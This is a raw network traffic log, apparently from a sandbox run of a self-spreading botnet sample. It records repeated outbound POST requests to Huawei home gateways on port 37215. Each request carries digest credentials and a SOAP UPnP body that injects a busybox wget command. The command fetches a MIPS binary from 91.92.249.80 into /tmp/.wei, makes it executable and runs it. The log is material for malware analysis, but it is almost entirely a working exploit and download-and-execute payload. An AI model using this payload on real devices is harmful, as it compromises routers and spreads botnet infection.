                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2368192.168.2.2346110197.216.181.14937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.680711031 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2369192.168.2.2332822120.186.177.12537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681090117 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2370192.168.2.2337110157.235.117.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681099892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2371192.168.2.233513241.63.20.4337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681107998 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2372192.168.2.233529041.202.73.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681127071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2373192.168.2.234439441.15.52.23937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681127071 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2374192.168.2.236004441.96.179.17537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681142092 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2375192.168.2.2341412157.89.3.15937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681183100 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2376192.168.2.236090451.36.32.14437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681185961 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2377192.168.2.235617041.89.100.17937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681209087 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2378192.168.2.2342368170.77.241.22437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681226015 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
